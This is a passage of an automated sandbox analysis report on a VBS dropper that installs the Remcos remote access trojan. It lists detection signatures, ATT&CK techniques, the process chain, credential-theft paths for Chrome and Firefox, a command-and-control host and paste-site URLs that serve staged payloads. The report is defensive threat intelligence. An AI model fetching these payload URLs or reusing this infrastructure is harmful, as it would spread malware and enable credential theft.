                    Source: Yara matchFile source: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.1927741950.0000026035520000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.1927741950.0000026035581000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 980, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: AddInProcess32.exe PID: 7372, type: MEMORYSTR
                    Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                    Contains functionality to steal Chrome passwords or cookies
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data8_2_0040BA4D
                    Contains functionality to steal Firefox passwords or cookies
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\8_2_0040BB6B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: \key3.db8_2_0040BB6B

                    Remote Access Functionality

                    barindex
                    Detected Remcos RAT
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-T0UVJ0Jump to behavior
                    Yara detected Remcos RAT
                    Source: Yara matchFile source: 8.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.powershell.exe.260356ab680.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.powershell.exe.260356ab680.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000008.00000002.2961914920.0000000002C1E000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.2961016698.0000000000F38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.1927741950.0000026035520000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.1927741950.0000026035581000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 980, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: AddInProcess32.exe PID: 7372, type: MEMORYSTR
                    Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: cmd.exe8_2_0040569A

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity Information121
                    Scripting                    		Valid Accounts1
                    Native API                    		121
                    Scripting                    		1
                    DLL Side-Loading                    		111
                    Deobfuscate/Decode Files or Information                    		1
                    OS Credential Dumping                    		2
                    System Time Discovery                    		Remote Services12
                    Archive Collected Data                    		1
                    Web Service                    		Exfiltration Over Other Network Medium1
                    System Shutdown/Reboot
                    CredentialsDomainsDefault Accounts1
                    Exploitation for Client Execution                    		1
                    DLL Side-Loading                    		1
                    Bypass User Account Control                    		4
                    Obfuscated Files or Information                    		211
                    Input Capture                    		1
                    Account Discovery                    		Remote Desktop Protocol211
                    Input Capture                    		12
                    Ingress Tool Transfer                    		Exfiltration Over Bluetooth1
                    Defacement
                    Email AddressesDNS ServerDomain Accounts3
                    Command and Scripting Interpreter                    		1
                    Windows Service                    		1
                    Access Token Manipulation                    		1
                    Software Packing                    		2
                    Credentials In Files                    		1
                    System Service Discovery                    		SMB/Windows Admin Shares3
                    Clipboard Data                    		21
                    Encrypted Channel                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal Accounts2
                    Service Execution                    		Login Hook1
                    Windows Service                    		1
                    DLL Side-Loading                    		NTDS3
                    File and Directory Discovery                    		Distributed Component Object ModelInput Capture1
                    Non-Standard Port                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud Accounts3
                    PowerShell                    		Network Logon Script222
                    Process Injection                    		1
                    Bypass User Account Control                    		LSA Secrets33
                    System Information Discovery                    		SSHKeylogging1
                    Remote Access Software                    		Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    Masquerading                    		Cached Domain Credentials21
                    Security Software Discovery                    		VNCGUI Input Capture2
                    Non-Application Layer Protocol                    		Data Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items31
                    Virtualization/Sandbox Evasion                    		DCSync31
                    Virtualization/Sandbox Evasion                    		Windows Remote ManagementWeb Portal Capture213
                    Application Layer Protocol                    		Exfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                    Access Token Manipulation                    		Proc Filesystem3
                    Process Discovery                    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt222
                    Process Injection                    		/etc/passwd and /etc/shadow1
                    Application Window Discovery                    		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                    System Owner/User Discovery                    		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                    Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchdStripped PayloadsInput Capture1
                    Remote System Discovery                    		Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                    Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled TaskEmbedded PayloadsKeylogging1
                    System Network Configuration Discovery                    		Taint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1545852 Sample: asegurar.vbs Startdate: 31/10/2024 Architecture: WINDOWS Score: 100 34 sost.duckdns.org 2->34 36 pastebin.com 2->36 38 2 other IPs or domains 2->38 58 Suricata IDS alerts for network traffic 2->58 60 Found malware configuration 2->60 62 Malicious sample detected (through community Yara rule) 2->62 68 17 other signatures 2->68 9 wscript.exe 1 2->9         started        signatures3 64 Uses dynamic DNS services 34->64 66 Connects to a pastebin service (likely for C&C) 36->66 process4 signatures5 78 Suspicious powershell command line found 9->78 80 Wscript starts Powershell (via cmd or directly) 9->80 82 Windows Scripting host queries suspicious COM object (likely to drop second stage) 9->82 84 Suspicious execution chain found 9->84 12 powershell.exe 7 9->12         started        process6 signatures7 86 Suspicious powershell command line found 12->86 88 Encrypted powershell cmdline option found 12->88 90 Uses ping.exe to check the status of other devices and networks 12->90 92 Found suspicious powershell code related to unpacking or dynamic code loading 12->92 15 powershell.exe 14 17 12->15         started        19 conhost.exe 12->19         started        process8 dnsIp9 46 pastebin.com 104.20.3.235, 443, 49730, 49732 CLOUDFLARENETUS United States 15->46 48 paste.ee 188.114.97.3, 443, 49736 CLOUDFLARENETUS European Union 15->48 50 Encrypted powershell cmdline option found 15->50 52 Writes to foreign memory regions 15->52 54 Potential dropper URLs found in powershell memory 15->54 56 Injects a PE file into a foreign processes 15->56 21 AddInProcess32.exe 3 2 15->21         started        26 PING.EXE 1 15->26         started        28 powershell.exe 15 15->28         started        30 cmd.exe 1 15->30         started        signatures10 process11 dnsIp12 40 sost.duckdns.org 181.236.112.169, 2001, 49741, 49742 COLOMBIATELECOMUNICACIONESSAESPCO Colombia 21->40 32 C:\ProgramData\remcos\logs.dat, data 21->32 dropped 70 Contains functionality to bypass UAC (CMSTPLUA) 21->70 72 Detected Remcos RAT 21->72 74 Contains functionalty to change the wallpaper 21->74 76 5 other signatures 21->76 42 127.0.0.1 unknown unknown 26->42 44 rentry.org 164.132.58.105, 443, 49731, 49733 OVHFR France 28->44 file13 signatures14

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    asegurar.vbs16%ReversingLabsWin32.Trojan.Honolulu

                    Dropped Files

                    No Antivirus matches

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    SourceDetectionScannerLabelLink
                    paste.ee1%VirustotalBrowse
                    sost.duckdns.org0%VirustotalBrowse
                    rentry.org0%VirustotalBrowse
                    pastebin.com0%VirustotalBrowse

                    URLs

                    SourceDetectionScannerLabelLink
                    http://nuget.org/NuGet.exe0%URL Reputationsafe
                    http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                    https://go.micro0%URL Reputationsafe
                    https://contoso.com/License0%URL Reputationsafe
                    https://contoso.com/Icon0%URL Reputationsafe
                    https://aka.ms/pscore60%URL Reputationsafe
                    http://geoplugin.net/json.gp0%URL Reputationsafe
                    http://geoplugin.net/json.gp/C0%URL Reputationsafe
                    https://contoso.com/0%URL Reputationsafe
                    https://nuget.org/nuget.exe0%URL Reputationsafe
                    https://aka.ms/pscore680%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    paste.ee
                    		188.114.97.3
                    		truetrueunknown
                    sost.duckdns.org
                    		181.236.112.169
                    		truetrueunknown
                    rentry.org
                    		164.132.58.105
                    		truefalseunknown
                    pastebin.com
                    		104.20.3.235
                    		truetrueunknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    https://rentry.org/vsm4ofxs/rawfalse
                      		unknown
                      https://paste.ee/d/Rrk2f/0true
                        		unknown
                        https://pastebin.com/raw/J6uRjZrvtrue
                          		unknown
                          https://rentry.org/shqm6g9p/rawfalse
                            		unknown
                            sost.duckdns.orgtrue
                              		unknown
                              https://pastebin.com/raw/4B83LcVUfalse
                                		unknown

                                URLs from Memory and Binaries

                                NameSourceMaliciousAntivirus DetectionReputation
                                http://nuget.org/NuGet.exepowershell.exe, 00000003.00000002.1927741950.0000026035581000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1786360295.00000201819E4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1798573819.00000201901B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1798573819.0000020190072000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000006.00000002.1786360295.000002018022D000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://paste.eepowershell.exe, 00000003.00000002.1886765737.0000026025AD5000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		unknown
                                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000006.00000002.1786360295.000002018022D000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		unknown
                                    https://go.micropowershell.exe, 00000003.00000002.1886765737.00000260265B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1786360295.0000020181474000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://rentry.orgpowershell.exe, 00000003.00000002.1886765737.0000026027222000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1886765737.0000026025A8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1786360295.0000020181474000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		unknown
                                      https://pastebin.com/rawpowershell.exe, 00000003.00000002.1886765737.000002602716A000.00000004.00000800.00020000.00000000.sdmptrue
                                        		unknown
                                        https://rentry.org/shqm6g9p/rawPpowershell.exe, 00000003.00000002.1886765737.0000026027222000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		unknown
                                          https://contoso.com/Licensepowershell.exe, 00000006.00000002.1798573819.0000020190072000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://www.google.com;powershell.exe, 00000003.00000002.1886765737.0000026025ADB000.00000004.00000800.00020000.00000000.sdmptrue
                                            		unknown
                                            https://contoso.com/Iconpowershell.exe, 00000006.00000002.1798573819.0000020190072000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://analytics.paste.eepowershell.exe, 00000003.00000002.1886765737.0000026025ADB000.00000004.00000800.00020000.00000000.sdmptrue
                                              		unknown
                                              https://paste.eepowershell.exe, 00000003.00000002.1886765737.0000026025AD5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		unknown
                                                https://aka.ms/pscore6powershell.exe, 00000001.00000002.1956266519.000002238A865000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://github.com/Pester/Pesterpowershell.exe, 00000006.00000002.1786360295.000002018022D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  http://geoplugin.net/json.gpAddInProcess32.exefalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://www.google.compowershell.exe, 00000003.00000002.1886765737.0000026025ADB000.00000004.00000800.00020000.00000000.sdmptrue
                                                    		unknown
                                                    http://rentry.orgpowershell.exe, 00000003.00000002.1886765737.0000026027222000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1786360295.0000020181950000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		unknown
                                                      http://geoplugin.net/json.gp/Cpowershell.exe, 00000003.00000002.1927741950.0000026035520000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1927741950.0000026035581000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      HTTPS://PASTE.EE/D/RRK2F/0powershell.exe, 00000003.00000002.1886765737.0000026025AD5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        https://contoso.com/powershell.exe, 00000006.00000002.1798573819.0000020190072000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        https://nuget.org/nuget.exepowershell.exe, 00000003.00000002.1927741950.0000026035581000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1786360295.00000201819E4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1798573819.00000201901B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1798573819.0000020190072000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        https://rentry.org/vsm4ofxs/rawppowershell.exe, 00000006.00000002.1786360295.0000020181474000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		unknown
                                                          https://analytics.paste.ee;powershell.exe, 00000003.00000002.1886765737.0000026025ADB000.00000004.00000800.00020000.00000000.sdmptrue
                                                            		unknown
                                                            https://cdnjs.cloudflare.compowershell.exe, 00000003.00000002.1886765737.0000026025ADB000.00000004.00000800.00020000.00000000.sdmptrue
                                                              		unknown
                                                              https://aka.ms/pscore68powershell.exe, 00000001.00000002.1956266519.000002238A87B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1886765737.0000026025511000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1786360295.0000020180001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              https://cdnjs.cloudflare.com;powershell.exe, 00000003.00000002.1886765737.0000026025ADB000.00000004.00000800.00020000.00000000.sdmptrue
                                                                		unknown
                                                                http://www.apache.opowershell.exe, 00000006.00000002.1803498782.00000201EA48A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		unknown
                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.1956266519.000002238A811000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1886765737.0000026025511000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1786360295.0000020180001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  http://pastebin.compowershell.exe, 00000003.00000002.1886765737.0000026026B34000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1886765737.00000260271BB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		unknown
                                                                    https://pastebin.compowershell.exe, 00000003.00000002.1886765737.000002602716A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1886765737.00000260265B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1886765737.00000260258D8000.00000004.00000800.00020000.00000000.sdmptrue
                                                                      		unknown
                                                                      https://secure.gravatar.compowershell.exe, 00000003.00000002.1886765737.0000026025ADB000.00000004.00000800.00020000.00000000.sdmptrue
                                                                        		unknown
                                                                        https://themes.googleusercontent.compowershell.exe, 00000003.00000002.1886765737.0000026025ADB000.00000004.00000800.00020000.00000000.sdmptrue
                                                                          		unknown

                                                                          World Map of Contacted IPs

                                                                          • No. of IPs < 25%
                                                                          • 25% < No. of IPs < 50%
                                                                          • 50% < No. of IPs < 75%
                                                                          • 75% < No. of IPs

                                                                          Public IPs

                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                          104.20.3.235
                                                                          		pastebin.comUnited States
                                                                          		13335CLOUDFLARENETUStrue
                                                                          181.236.112.169
                                                                          		sost.duckdns.orgColombia
                                                                          		3816COLOMBIATELECOMUNICACIONESSAESPCOtrue
                                                                          164.132.58.105
                                                                          		rentry.orgFrance
                                                                          		16276OVHFRfalse
                                                                          188.114.97.3
                                                                          		paste.eeEuropean Union
                                                                          		13335CLOUDFLARENETUStrue

                                                                          Private

                                                                          IP
                                                                          127.0.0.1

                                                                          General Information

                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                          Analysis ID:1545852
                                                                          Start date and time:2024-10-31 07:40:08 +01:00
                                                                          Joe Sandbox product:CloudBasic
                                                                          Overall analysis duration:0h 6m 20s
                                                                          Hypervisor based Inspection enabled:false
                                                                          Report type:full
                                                                          Cookbook file name:default.jbs
                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                          Number of analysed new started processes analysed:12
                                                                          Number of new started drivers analysed:0
                                                                          Number of existing processes analysed:0
                                                                          Number of existing drivers analysed:0
                                                                          Number of injected processes analysed:0
                                                                          Technologies:
                                                                          • HCA enabled
                                                                          • EGA enabled
                                                                          • AMSI enabled
                                                                          Analysis Mode:default
                                                                          Analysis stop reason:Timeout
                                                                          Sample name:asegurar.vbs
                                                                          Detection:MAL
                                                                          Classification:mal100.rans.troj.spyw.expl.evad.winVBS@14/10@5/5
                                                                          EGA Information:
                                                                          • Successful, ratio: 25%
                                                                          HCA Information:
                                                                          • Successful, ratio: 94%
                                                                          • Number of executed functions: 49
                                                                          • Number of non-executed functions: 190
                                                                          Cookbook Comments:
                                                                          • Found application associated with file extension: .vbs

                                                                          Warnings

                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                          • Execution Graph export aborted for target powershell.exe, PID 3548 because it is empty
                                                                          • Execution Graph export aborted for target powershell.exe, PID 5480 because it is empty
                                                                          • Execution Graph export aborted for target powershell.exe, PID 980 because it is empty
                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                          Simulations

                                                                          Behavior and APIs

                                                                          TimeTypeDescription
                                                                          02:41:04API Interceptor99x Sleep call for process: powershell.exe modified
                                                                          02:41:53API Interceptor1628504x Sleep call for process: AddInProcess32.exe modified

                                                                          Joe Sandbox View / Context

                                                                          IPs

                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          104.20.3.235cr_asm3.ps1Get hashmaliciousUnknownBrowse
                                                                          • pastebin.com/raw/sA04Mwk2
                                                                          gabe.ps1Get hashmaliciousUnknownBrowse
                                                                          • pastebin.com/raw/sA04Mwk2
                                                                          cr_asm.ps1Get hashmaliciousUnknownBrowse
                                                                          • pastebin.com/raw/sA04Mwk2
                                                                          cr_asm_atCAD.ps1Get hashmaliciousUnknownBrowse
                                                                          • pastebin.com/raw/sA04Mwk2
                                                                          vF20HtY4a4.exeGet hashmaliciousUnknownBrowse
                                                                          • pastebin.com/raw/sA04Mwk2
                                                                          OSLdZanXNc.exeGet hashmaliciousUnknownBrowse
                                                                          • pastebin.com/raw/sA04Mwk2
                                                                          5UIy3bo46y.dllGet hashmaliciousUnknownBrowse
                                                                          • pastebin.com/raw/sA04Mwk2
                                                                          Lm9IJ4r9oO.exeGet hashmaliciousUnknownBrowse
                                                                          • pastebin.com/raw/sA04Mwk2
                                                                          BeginSync lnk.lnkGet hashmaliciousUnknownBrowse
                                                                          • pastebin.com/raw/sA04Mwk2
                                                                          sostener.vbsGet hashmaliciousNjratBrowse
                                                                          • pastebin.com/raw/V9y5Q5vv
                                                                          164.132.58.105XS_Trade_AI-newest_release_.exeGet hashmaliciousLummaCBrowse
                                                                            sims-4-updater-v1.3.4.exeGet hashmaliciousUnknownBrowse
                                                                              RedEngine.exeGet hashmaliciousBabadeda, RedLineBrowse
                                                                                setup.exeGet hashmaliciousBabadeda, RHADAMANTHYS, RedLineBrowse
                                                                                  8MO5hfPa8d.exeGet hashmaliciousAsyncRAT, Clipboard HijackerBrowse
                                                                                    SecuriteInfo.com.HEUR.Trojan.MSIL.Agent.gen.12009.5536.exeGet hashmaliciousAsyncRAT, Clipboard HijackerBrowse
                                                                                      DLL_Injector_Resou_nls..scr.exeGet hashmaliciousAsyncRAT, Clipboard Hijacker, zgRATBrowse
                                                                                        SynapseX_injector.exeGet hashmaliciousPython Stealer, MicroClipBrowse
                                                                                          2PKbNS1Q41.exeGet hashmaliciousPython StealerBrowse
                                                                                            3yypk0NA7b.exeGet hashmaliciousUnknownBrowse
                                                                                              188.114.97.3lf1SPbZI3V.exeGet hashmaliciousLokibotBrowse
                                                                                              • touxzw.ir/alpha2/five/fre.php
                                                                                              Comprobante de pago.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                                              • paste.ee/d/vdlzo
                                                                                              Purchase_Order_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                              • www.bayarcepat19.click/g48c/
                                                                                              zxalphamn.docGet hashmaliciousLokibotBrowse
                                                                                              • touxzw.ir/alpha2/five/fre.php
                                                                                              rPO-000172483.exeGet hashmaliciousFormBookBrowse
                                                                                              • www.launchdreamidea.xyz/2b9b/
                                                                                              rPO_28102400.exeGet hashmaliciousLokibotBrowse
                                                                                              • ghcopz.shop/ClarkB/PWS/fre.php
                                                                                              PbfYaIvR5B.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                              • windowsxp.top/ExternaltoPhppollcpuupdateTrafficpublic.php
                                                                                              SR3JZpolPo.exeGet hashmaliciousJohnWalkerTexasLoaderBrowse
                                                                                              • xilloolli.com/api.php?status=1&wallets=0&av=1
                                                                                              5Z1WFRMTOXRH6X21Z8NU8.exeGet hashmaliciousUnknownBrowse
                                                                                              • artvisions-autoinsider.com/8bkjdSdfjCe/index.php
                                                                                              PO 4800040256.exeGet hashmaliciousFormBookBrowse
                                                                                              • www.cc101.pro/4hfb/

                                                                                              Domains

                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              rentry.orgXS_Trade_AI-newest_release_.exeGet hashmaliciousLummaCBrowse
                                                                                              • 164.132.58.105
                                                                                              sims-4-updater-v1.3.4.exeGet hashmaliciousUnknownBrowse
                                                                                              • 164.132.58.105
                                                                                              RedEngine.exeGet hashmaliciousBabadeda, RedLineBrowse
                                                                                              • 164.132.58.105
                                                                                              AtlasLoader.exeGet hashmaliciousUnknownBrowse
                                                                                              • 198.251.88.130
                                                                                              AtlasLoader.exeGet hashmaliciousUnknownBrowse
                                                                                              • 198.251.88.130
                                                                                              LX.exeGet hashmaliciousUnknownBrowse
                                                                                              • 198.251.88.130
                                                                                              lucim.exeGet hashmaliciousXmrigBrowse
                                                                                              • 198.251.88.130
                                                                                              Activator.exeGet hashmaliciousXmrigBrowse
                                                                                              • 198.251.88.130
                                                                                              EzLoader.exeGet hashmaliciousRHADAMANTHYS, XmrigBrowse
                                                                                              • 198.251.88.130
                                                                                              LolixLoader.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                              • 198.251.88.130
                                                                                              pastebin.comSecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exeGet hashmaliciousXmrigBrowse
                                                                                              • 104.20.4.235
                                                                                              seethebestthingstobegetmebackwithherlove.htaGet hashmaliciousCobalt StrikeBrowse
                                                                                              • 172.67.19.24
                                                                                              BL Packing List & Invoice.xlsGet hashmaliciousUnknownBrowse
                                                                                              • 104.20.4.235
                                                                                              DHLShippingInvoicesAwbBL000000000102220242247.vbsGet hashmaliciousRemcosBrowse
                                                                                              • 104.20.4.235
                                                                                              a1OueQJq4d.exeGet hashmaliciousDCRatBrowse
                                                                                              • 172.67.19.24
                                                                                              4b7b5bc7b0d1f70adf6b80390f1273723c409b837c957.dllGet hashmaliciousUnknownBrowse
                                                                                              • 104.20.4.235
                                                                                              loader.exeGet hashmaliciousXmrigBrowse
                                                                                              • 104.20.4.235
                                                                                              SecuriteInfo.com.Win64.Evo-gen.31489.1077.exeGet hashmaliciousXmrigBrowse
                                                                                              • 172.67.19.24
                                                                                              6TCmDl2rFY.exeGet hashmaliciousDCRatBrowse
                                                                                              • 104.20.4.235
                                                                                              AF1cyL4cv6.vbsGet hashmaliciousAsyncRATBrowse
                                                                                              • 104.20.4.235
                                                                                              paste.eeComprobante de pago.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                                              • 188.114.97.3
                                                                                              EwKKdCrEDu.exeGet hashmaliciousUnknownBrowse
                                                                                              • 188.114.96.3
                                                                                              EwKKdCrEDu.exeGet hashmaliciousUnknownBrowse
                                                                                              • 188.114.97.3
                                                                                              transferencia interbancaria_667553466579.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                                              • 188.114.96.3
                                                                                              Comprobante de pago.xlam.xlsxGet hashmaliciousUnknownBrowse
                                                                                              • 188.114.97.3
                                                                                              Orden de Compra No. 78986756565344657.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                                              • 188.114.96.3
                                                                                              seethebestthingstobegetmebackwithherlove.htaGet hashmaliciousCobalt StrikeBrowse
                                                                                              • 188.114.97.3
                                                                                              necgoodthingswithgreatthingsentirethingstobeinonline.htaGet hashmaliciousCobalt StrikeBrowse
                                                                                              • 188.114.97.3
                                                                                              BL Packing List & Invoice.xlsGet hashmaliciousUnknownBrowse
                                                                                              • 188.114.97.3
                                                                                              DHLShippingInvoicesAwbBL000000000102220242247.vbsGet hashmaliciousRemcosBrowse
                                                                                              • 188.114.96.3

                                                                                              ASNs

                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              CLOUDFLARENETUSfile.exeGet hashmaliciousLummaCBrowse
                                                                                              • 188.114.96.3
                                                                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                              • 188.114.97.3
                                                                                              A & C Metrology OC 545714677889Materiale.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                              • 104.21.74.191
                                                                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                              • 188.114.97.3
                                                                                              file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar, WhiteSnake StealerBrowse
                                                                                              • 188.114.96.3
                                                                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                              • 188.114.97.3
